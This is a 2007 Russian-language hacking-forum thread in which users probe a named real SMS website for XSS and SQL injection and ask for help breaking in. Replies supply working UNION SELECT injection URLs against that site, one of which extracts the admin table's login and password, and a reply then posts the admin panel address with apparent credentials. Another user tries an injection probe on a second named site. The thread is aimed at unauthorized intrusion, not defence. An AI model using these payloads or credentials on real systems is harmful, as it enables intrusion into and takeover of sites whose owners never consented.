sql inj хелп ми

Discussion in 'Уязвимости' started by Dimi4, 30 Oct 2007.

Thread Status:
Not open for further replies.
  1. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Есть один сайтег.С виду кул, но мною там было обнаружено баги.В том и дело что только обнаружено. :(
    Вот ход моих действий.:
    !)Иду по сцылге: http://mysms.ipsys.net/
    2)Вижу там "Пошук" и сразу сую джаваскрипт:
    PHP:
    "><script>alert()</script>
    Мне выдает:
    Понимаю с етим ничево не зделаю....
    3) Смотрю дальше..
    И вижу строчку:
    ОоО.Руки тянутся вбить
    PHP:
    /index.php?smstype=phpinj
    Как результат -
    Ничево нешарю в mysqlinj, потомо и незнаю что с етим делать...
    4) Покопавшись исчо увидил
    Сразу вбил
    PHP:
     ') OR ('1'='1
    Ничяво..
    Прошу хелпа у знающих...
    Пасиб за внимание
     
    #1 Dimi4, 30 Oct 2007
    Last edited: 30 Oct 2007
    1 person likes this.
  2. Heavy Metal

    Heavy Metal Member

    Joined:
    16 Sep 2007
    Messages:
    19
    Likes Received:
    27
    Reputations:
    7
    http://mysms.ipsys.net/index.php?smstype=0xaaaa+union+select+1,2,version(),4,5/*
     
    1 person likes this.
  3. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    А как бы ето заюзать?
     
  4. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Code:
    http://mysms.ipsys.net/index.php?smstype=-7+union+select+1,concat(login,0x3a,pass)+from+admin+limit+0,1
    админка:
    http://mysms.ipsys.net/admin/index.php
    login:Baltazor
    pass:stones
     
    4 people like this.
  5. street16

    street16 Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    42
    Likes Received:
    5
    Reputations:
    1
    http://www.fuck.ru/products.aspx?id='
    Значит ли че нить!!!!Иля я просто напрасно это делаю???
    Server Error in '/' Application.
    --------------------------------------------------------------------------------

    Runtime Error
    Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

    Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".


    <!-- Web.Config Configuration File -->

    <configuration>
    <system.web>
    <customErrors mode="Off"/>
    </system.web>
    </configuration>


    Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
     
  6. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    К сожалению…напрасно) :)
     
  7. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Используйте специально прикрепленную тему для вопросов.
     
Thread Status:
Not open for further replies.